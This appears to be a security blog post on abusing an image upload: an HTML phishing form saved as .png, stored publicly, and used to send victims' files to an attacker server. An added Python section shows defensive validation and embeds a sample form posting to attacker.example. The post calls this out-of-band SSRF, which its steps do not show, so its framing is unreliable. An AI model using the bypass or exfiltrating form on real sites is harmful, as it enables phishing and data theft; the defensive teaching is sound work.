File upload features are everywhere — profile pictures, reports, documents, logs. Most developers treat them as low-risk functionality once file type and size checks are in place.
But what if a simple file upload could silently force a backend server to make outbound requests? What if those requests never touch the user interface, logs, or application responses — yet still leak internal access?
This is where Out-of-Band (OOB) Server-Side Request Forgery (SSRF) comes into play.
In this blog, I'll walk through how seemingly harmless file upload functionality can be abused to trigger SSRF in a completely blind manner, how attackers detect it using OOB techniques, and why traditional SSRF defenses often fail to catch it.
Step 1: Navigate to the "Header Logo" functionality shown below. The application allows image files to be uploaded. We will save an HTML file with a .png extension and try to upload it.

Step 2: Save the HTML file below with a .png extension. The page it contains is a phishing form: it tricks the victim into uploading a file, and that file is sent to the attacker-controlled server.

Step 3: The application checks the file extension but not the content of the file. Upload the file by clicking the "Publish" button.

Step 4: Capture the upload request in the proxy tool and observe the highlighted text below.
Step 5: In the intercepted request, change the file extension and the Content-Type of the file part as shown below.
Step 6: Below is the location to which the file is uploaded.

Step 7: The upload location turned out to be public, reachable without a session. Download the file above in an incognito browser window.

Step 8: Open the downloaded file in a browser.

Step 9: Upload a sample PDF file through the phishing form, as shown below.


Step 10: The file reaches the attacker-controlled server, shown below.

Step 11: Copy the highlighted value above and paste it into a browser as shown below. We get the sample PDF that the victim uploaded via the phishing page.
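The server-side checks a defender would want for the walkthrough above, as an added example that is not part of the original post: a Python sketch of the extension-only validation the steps bypass, beside a content-aware check that sniffs the leading bytes, cross-checks the declared Content-Type and the extension against them, and builds headers so a public upload location never renders a stored file as HTML. The function names, the constructed phishing form, the placeholder attacker.example host and the embedded 1x1 PNG are all assumptions for illustration.

```python
"""Added example (not the original post's code): extension-only upload
validation versus a content-aware check, plus safe serving headers.
Function names, sample bytes and hostnames are assumptions for illustration."""
import struct
from typing import Optional, Tuple

ALLOWED = {  # extension -> MIME type the server is willing to store
    "png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif",
}

# Constructed sample: the kind of phishing form the post describes, saved as
# "logo.png". The action URL is a placeholder, not a real host.
PHISHING_HTML = (
    b"<!DOCTYPE html><html><body><h1>Session expired, please re-upload</h1>"
    b'<form method="post" enctype="multipart/form-data" '
    b'action="https://attacker.example/collect">'
    b'<input type="file" name="document"><button>Upload</button></form></body></html>'
)

# Constructed sample: a genuine 1x1 PNG (signature, IHDR, IDAT, IEND).
SAMPLE_PNG = bytes.fromhex(
    "89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c489"
    "0000000a49444154789c63000100000500010d0a2db40000000049454e44ae426082"
)


def extension_only_check(filename: str) -> bool:
    """The weak check the walkthrough bypasses: only the name is inspected."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED


def sniff_image_type(data: bytes) -> Optional[str]:
    """Identify the image type from its leading bytes, or None if unrecognised."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        # A PNG's first chunk must be IHDR: 4-byte length 13, 'IHDR', 13 data bytes, CRC.
        if len(data) < 33 or data[8:16] != b"\x00\x00\x00\x0dIHDR":
            return None
        width, height = struct.unpack(">II", data[16:24])
        return "image/png" if width and height else None
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    if data.startswith((b"GIF87a", b"GIF89a")):
        return "image/gif"
    return None


def looks_like_markup(data: bytes) -> bool:
    """Reject bodies a browser would happily render as a document."""
    head = data[:1024].lstrip().lower()
    return head.startswith((b"<!doctype", b"<html", b"<script", b"<svg", b"<?xml"))


def validate_image_upload(filename: str, content_type: str, data: bytes) -> Tuple[bool, str]:
    """Content-aware check: name, declared type and actual bytes must all agree."""
    if not extension_only_check(filename):
        return False, "extension not allowed"
    expected = ALLOWED[filename.rsplit(".", 1)[-1].lower()]
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared != expected:
        return False, "Content-Type does not match extension"
    if looks_like_markup(data):
        return False, "body contains markup"
    sniffed = sniff_image_type(data)
    if sniffed != expected:
        return False, "body is not the image type the name claims"
    return True, sniffed


def download_headers(stored_name: str, mime: str) -> dict:
    """Headers for serving from a public upload location. Subresource loads such
    as <img src> still display; only direct navigation is forced to a download,
    and nosniff stops the browser second-guessing the declared type."""
    return {
        "Content-Type": mime,
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


def replay_walkthrough() -> dict:
    """The requests from the walkthrough: as the browser sends the renamed HTML,
    and after the extension and Content-Type were edited in the proxy."""
    return {
        "browser_sent_extension_only": extension_only_check("logo.png"),
        "browser_sent_hardened": validate_image_upload("logo.png", "image/png", PHISHING_HTML),
        "proxy_edited_hardened": validate_image_upload("logo.html", "text/html", PHISHING_HTML),
        "real_png_hardened": validate_image_upload("logo.png", "image/png", SAMPLE_PNG),
    }


if __name__ == "__main__":
    for name, result in replay_walkthrough().items():
        print(f"{name}: {result}")
```

The header parse is deliberately shallow: it is enough to show why the renamed HTML fails and the real PNG passes, but a production upload handler should re-encode the image with an image library and store it under a server-generated name, so that nothing the client sent (name, type or bytes) reaches the public location unchanged.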
